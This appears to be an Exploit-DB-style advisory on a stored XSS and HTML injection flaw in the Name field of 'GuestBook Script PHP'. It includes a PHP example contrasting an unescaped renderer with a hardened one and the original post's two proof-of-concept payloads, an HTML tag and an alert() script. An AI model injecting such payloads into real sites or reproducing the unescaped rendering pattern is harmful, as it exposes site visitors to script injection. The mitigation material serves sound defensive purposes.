Vendor: GuestBook Script PHP
Author: AnTi SeCuRe
CVSS: 8.8 (HIGH)
Type: XSS/HTML Injection
CWE: 79 (XSS)
Product Name: GuestBook Script PHP
Patch Exists: YES
Published: 2010

GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities

The vulnerability exists in the 'Name' field of the 'Add a New Comment' form. An attacker can submit HTML or JavaScript in the 'Name' field; the value is stored with the comment and rendered unescaped, so the injected markup or script executes in the browser of every user who later views the guestbook.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the 'Name' field.
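The following is an added example, not the vendor's GuestBook Script PHP code: a minimal comment renderer in the vulnerable shape described above next to a hardened version that validates the Name on input and encodes it on output. Function names are assumptions, and the demonstration inputs are the two Name payloads from the advisory plus one legitimate name.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern: the stored Name is echoed verbatim into the page,
// so any tags or script inside it are interpreted by the viewer's browser.
function render_comment_unsafe(string $name, string $comment): string
{
    return "<div class=\"entry\"><b>{$name}</b> wrote: {$comment}</div>";
}

// Layer 1: validate Name on input with a length bound and an allow-list
// (letters, digits, space, dot, apostrophe, hyphen); reject, don't "clean".
function validate_name(string $name): bool
{
    return mb_strlen($name, 'UTF-8') <= 40
        && preg_match('/^[\p{L}\p{N} .\'-]+$/u', $name) === 1;
}

// Layer 2: encode on output regardless of validation. htmlspecialchars turns
// < > & " ' into entities, so the browser shows them as text, not markup.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_comment_safe(string $name, string $comment): string
{
    if (!validate_name($name)) {
        return '<div class="entry error">Invalid name.</div>';
    }
    return '<div class="entry"><b>' . esc($name) . '</b> wrote: '
        . esc($comment) . '</div>';
}

// Constructed demonstration inputs (the advisory's payloads and a real name).
$names = [
    '<p align="center"><b>Sa-ViRuS.CoM</b></p>',
    "<script>alert('AnTi SeCuRe - Sa-ViRuS.CoM')</script>",
    "Jane O'Neil",
];
foreach ($names as $n) {
    echo 'unsafe: ' . render_comment_unsafe($n, 'hello') . "\n";
    echo 'safe:   ' . render_comment_safe($n, 'hello') . "\n";
}
```

Run with `php example.php`: the unsafe lines reproduce the injected markup, the safe lines reject both payloads and render the real name with its apostrophe encoded as `&#039;`.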

Exploit-DB raw data:

=======================================================================
# GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities
=======================================================================
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#################################
#      _____ __    __  /_  __/  #
#     / ___/ \ \  / /   / /     #
#    (__  )   \ \/ /   / /      #
#   /____/     \__/   /_/       #
#################################
# Vendor: http://www.guestbookscripts.com/demo_guestbook.php
# Date: 2010-08-15
# Author: AnTi SeCuRe
# Greets: Sa-ViRuS.CoM , RENO , Dr.php , ! BaD BoY ! , Gov.HaCker , Dr.$audi all Sa-ViRuS.CoM Members ..
# Contact: AnTi-SeCuRe@HoTMaiL.CoM
# Home: WwW.Sa-ViRuS.CoM
########################################################################

[~] Note: It's not free; it's 17,99
[~] You can buy it from: http://www.guestbookscripts.com/buy_guestbook.php


[~] HTML Injection Vuln.: http://server/demo_guestbook.php?act=new
Add a new comment; the exploit goes in the Name field :)
<p align="center"><b>Sa-ViRuS.CoM</b></p>

[~] XSS Vuln.: http://server/demo_guestbook.php?act=new
Add a new comment; the exploit goes in the Name field :)
<script>alert('AnTi SeCuRe - Sa-ViRuS.CoM')</script>



Thx To : Allah